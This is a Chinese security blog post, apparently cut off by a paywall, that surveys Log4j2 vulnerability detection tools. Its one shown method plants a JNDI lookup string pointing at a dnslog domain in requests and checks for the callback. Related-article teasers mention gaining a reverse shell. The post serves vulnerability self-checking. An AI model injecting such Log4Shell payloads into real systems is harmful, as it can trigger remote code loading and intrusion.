Log4j2 漏洞检测工具清单

已于 2023-01-03 13:38:23 修改
阅读量1.2w 收藏 22
点赞数 4
分类专栏: 【红队攻防秘籍】 文章标签: python java 人工智能 http javascript
于 2022-01-17 08:00:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_23936389/article/details/122551643
版权
本文汇总了多种Log4j2漏洞检测工具,包括dnslog手动验证、Log4j-scan Python脚本、Log4j2 Burp插件、AWVS扫描、制品级检测工具、本地检测工具及360检测工具包,为安全测试提供全面的自查方案。
摘要由CSDN通过智能技术生成

距离Log4j2漏洞公开已经过去一个月了,它所造成的严重影响已经不需要我们重复提及了。随着时间的推移,新的漏洞会不断出现,旧的漏洞会不断消失,而这个Log4j2中的RCE漏洞可能需要好几年的时间才能得到解决。所以,在接下来的一段时间里,这个漏洞依然是我们需要去关注的重点。

本文收集和整理了几种漏洞检测方式和工具,以用于Log4j2漏洞检测和自查。

1、dnslog手动验证方法

首先在dnslog平台获取一个子域名,尝试构造payload,插入请求数据包。

 
 
${jndi:ldap://bypass.fzuqgl.ceye.io}
 
 
dd57d91e06afb32b10c22aacdcac55e9.png
 
 
通过dnslog平台是否收到请求,初步判断目标环境是否存在漏洞。
 
 



                

        

        

        

    

  


        

            

                

                

                了解本专栏
                
                
                  
                订阅专栏 解锁全文
                 
                
                    
                    超级会员免费看
                
            

            
            
            
        

    

      

        

            

              
                
                  Bypass--
                
              
            

            

                关注
              
            

        

        

          
      

      

            

                专栏目录
          

                

                        订阅专栏
                









                



	

		

			

				
					
log4j2漏洞检测工具

				
			

			

				

					05-07
				

			

		

		

			
				
1、检测项目中是否存在log4j的漏洞
2、工作使用

			
		

	



                

              
                



	

		

			

				
					
Apache Log4j2 远程代码执行漏洞检测工具

				
			

			

				

					12-15
				

			

		

		

			
				
Apache Log4j2 远程代码执行漏洞检测工具,包含windows版和linux版。图形化 Apache Log4j2检测工具 

			
		

	



                


  
              

                


	

		

			

				
					
Apache Log4j RCE 扫描器 - log4j-scan 指南

					
最新发布

				
			

			

				

					gitblog_00935的博客
				

				

					08-08
					
					451
					
				

			

		

		

			
				
Apache Log4j RCE 扫描器 - log4j-scan 指南
 log4j-scanA fully automated, accurate, and extensive scanner for finding log4j RCE CVE-2021-44228 项目地址:https://gitcode.com/gh_mirrors/lo/log4j-scan 1. 项目介绍
log4j-...

			
		

	





	

		

			

				
					
Log4j 漏洞修复检测 附检测工具

					
热门推荐

				
			

			

				

					cnsre运维博客
				

				

					12-13
					
					1万+
					
				

			

		

		

			
				
作者:SRE运维博客
博客地址:https://www.cnsre.cn/
文章地址:https://www.cnsre.cn/posts/211213210004/
相关话题:https://www.cnsre.cn/tags/Log4j/


近日的Log4j2,可是非常的火啊,我也是加班加点把补丁给打上了次安心。Apache Log4j2存在远程代码执行漏洞,经验证,该漏洞允许攻击者在目标服务器上执行任意代码,可导致服务器被黑客控制。由于Apache Log4j 2应用较为广泛,建议使用该组件的用..

			
		

	



		

			
		



	

		

			

				
					
2024最全前端面试系列(数据结构篇)(大厂必考算法),学习网页前端开发

				
			

			

				

					2401_84094620的博客
				

				

					04-03
					
					421
					
				

			

		

		

			
				
今天的文章可谓是积蓄了我这几年来的应聘和面试经历总结出来的经验,干货满满呀!如果你能够一直坚持看到这儿,那么首先我还是十分佩服你的毅力的。所以看完之后,还是多多行动起来吧!可以非常负责地说,如果你能够坚持把我上面列举的内容都一个不拉地看完并且全部消化为自己的知识的话,那么你就至少已经达到了中级开发工程师以上的水平,进入大厂技术这块是基本没有什么问题的了。今天的文章可谓是积蓄了我这几年来的应聘和面试经历总结出来的经验,干货满满呀!如果你能够一直坚持看到这儿,那么首先我还是十分佩服你的毅力的。

			
		

	





	

		

			

				
					
Struts2框架下Log4j2漏洞检测方法分析与总结!!!

				
			

			

				

					logic1001的博客
				

				

					03-07
					
					843
					
				

			

		

		

			
				
Log4j2漏洞出现有大半年的时间了,这个核弹级别的漏洞危害很大,但是这个漏洞检测起来却很麻烦,因为黑盒测试无法预判网站哪个应用功能在后台调用了log4j2记录日志功能。目前通用的做法就是使用burpsuite插件进行被动扫描,原理就是把所有与用户交互参数都用各种log4j2检测payload测试一遍,然后观察DNSlog中有没有访问记录。这个漏洞检测方法和SQL注入、XSS漏洞有点像,常规方法很难完全发现漏洞,有时候就连研发人员自己也搞不清楚哪些应用功能点调用了log4j2

			
		

	





	

		

			

				
					
Log4j2Scanner

				
			

			

				

					02-23
				

			

		

		

			
				
Log4j2-Scan

			
		

	





	

		

			

				
					
log4j2 burp插件-Log4j2Scan(二)

				
			

			

				

					siu~
				

				

					03-14
					
					2399
					
				

			

		

		

			
				
该工具为被动扫描Log4j2漏洞`CVE-2021-44228`的BurpSuite插件,具有多DNSLog(后端)平台支持,支持异步并发检测、内网检测、延迟检测等功能。

			
		

	





	

		

			

				
					
log4j2Scan.jar在log4j漏洞复现中的使用

				
			

			

				

					wutiangui的博客
				

				

					09-07
					
					469
					
				

			

		

		

			
				
不需要开启拦截,插件就可以自动检测该网站有没有log4j的漏洞。装完后浏览器打开一个有log4j漏洞的网站。首先在burp中安装该插件。有+号说明发现了漏洞

			
		

	





	

		

			

				
					
log4j2漏洞检测和利用

				
			

			

				

					qq_40909772的博客
				

				

					12-07
					
					1654
					
				

			

		

		

			
				
漏洞检测使用的是BP插件,插件地址。
JNDI注入工具,工具地址 https://github.com/welk1n/JNDI-Injection-Exploit/releases/tag/v1.0,命令如下:
将以下命令进行base64编码,IP替换为你攻击机IP。

使用工具命令如下:

burp发包:

反弹shell成功:

			
		

	





	

		

			

				
					
log4j2的简单使用

				
			

			

				

					DRB321的博客
				

				

					05-05
					
					1896
					
				

			

		

		

			
				
使用这个的初衷是因为在做自己的一个小的netty服务端的时候,用Jmeter压测了一下,结果发现并发数大了之后返回数据特别慢,最后排查是由于日志打印比较大数据(我有一个数据7万多的字节),因此采用log4j2的异步日志处理。

一、所需要jar:

disruptor-3.0.0.jar
log4j-api-2.3.jar
log4j-core-2.3.jar

二、配置文件

pom.xml:
...

			
		

	





	

		

			

				
					
扫描log4j2 版本扫描log4j2 版本

				
			

			

				

					12-16
				

			

		

		

			
				
扫描log4j2 版本,确定已经没有漏洞

			
		

	





	

		

			

				
					
Apache Log4j 2代码漏洞处置指南及检测工具.zip

				
			

			

				

					12-10
				

			

		

		

			
				
Apache Log4j 2存在远程代码执行漏洞处置指南 及期检测工具

			
		

	





	

		

			

				
					
Log4j2漏洞检测工具

				
			

			

				

					02-06
				

			

		

		

			
				
Apache log4j 2是一款开源的Java日志记录框架,提供方便的日志记录,通过定义每一条日志信息的级别,能够更加细致地控制日志生成过程,以便用于编写程序时进行调试,在项目上线后出现状况时也可根据日志记录来判断...

			
		

	





	

		

			

				
					
log4j2本地检测工具.zip

				
			

			

				

					10-10
				

			

		

		

			
				
Log4j2本地检测工具全面解析》  在IT安全领域,Log4j2的安全性备受关注,尤其是在2021年爆发的Log4Shell漏洞事件之后,对Log4j2的检查和管理成为了每个系统管理员的重要任务。本文将详细介绍“log4j2本地检测工具...

			
		

	





	

		

			

				
					
Apache Log4j 远程代码执行漏洞批量检测工具

				
			

			

				

					保持微笑的博客
				

				

					01-10
					
					3128
					
				

			

		

		

			
				
漏洞描述

  由于Apache Log4j2某些功能存在递归解析功能,攻击者可直接构造恶意请求,触发远程代码执行漏洞漏洞利用无需特殊配置,Apache Struts2、Apache Solr、Apache Druid、Apache Flink等均受影响。

影响版本
Apache Log4j 2.x < 2.15.0-rc2

影响范围

  含有该漏洞的Log4j影响到超过 6000个中间件或应用,目前已知的可能受影响的应用及组件包括但不限于如下清单中所列出的:


	Sp...

			
		

	





	

		

			

				
					
Log4j2详解

				
			

			

				

					飞扬大哥哥的技术人生
				

				

					07-08
					
					759
					
				

			

		

		

			
				
Log4j 2 包含了基于LMAX 分离库的下一代的异步日志系统,在多线程环境下,异步日志系统比 Log4j 1.x 和Logback 提高了10倍性能提升(吞吐量和延迟率 )。原文如下:Log4j 2 contains next-generation Asynchronous Loggers based on the LMAX Disruptor library. In multi-threade

			
		

	





	

		

			

				
					
log4j2 burp插件-log4j2burpscanner(一)

				
			

			

				

					siu~
				

				

					08-24
					
					1835
					
				

			

		

		

			
				
CVE-2021-44228 Log4j2 BurpSuite 扫描器

			
		

	





	

		

			

				
					
探索Log4j2内网扫描工具:安全防护的新利器

				
			

			

				

					gitblog_00071的博客
				

				

					04-22
					
					493
					
				

			

		

		

			
				
探索Log4j2内网扫描工具:安全防护的新利器
项目地址:https://gitcode.com/k3rwin/log4j2-intranet-scan

在最近的安全事件中,Apache Log4j2的远程代码执行漏洞(CVE-2021-44228)引起了广泛的关注。为了解决这个问题,开发者k3rwin创建了一个名为log4j2-intranet-scan的工具,旨在帮助系统管理员和网络安全专家...

			
		

	



              




          




        



    





    



      

      

        
      

      





	

		
评论 2

	

	
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  





	
打赏作者

	

		

		
			
		
		

		

			
Bypass--

			
你的鼓励将是我创作的最大动力

		

	

	

			

	

	

    ¥1
    ¥2
    ¥4
    ¥6
    ¥10
    ¥20
	

	

		

			

				

					扫码支付:¥1
				

				

					

					
					获取中
					

				

				

					
					
					扫码支付
				

			

		

		

			
您的余额不足,请更换扫码支付或充值

			
打赏作者

		

	



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值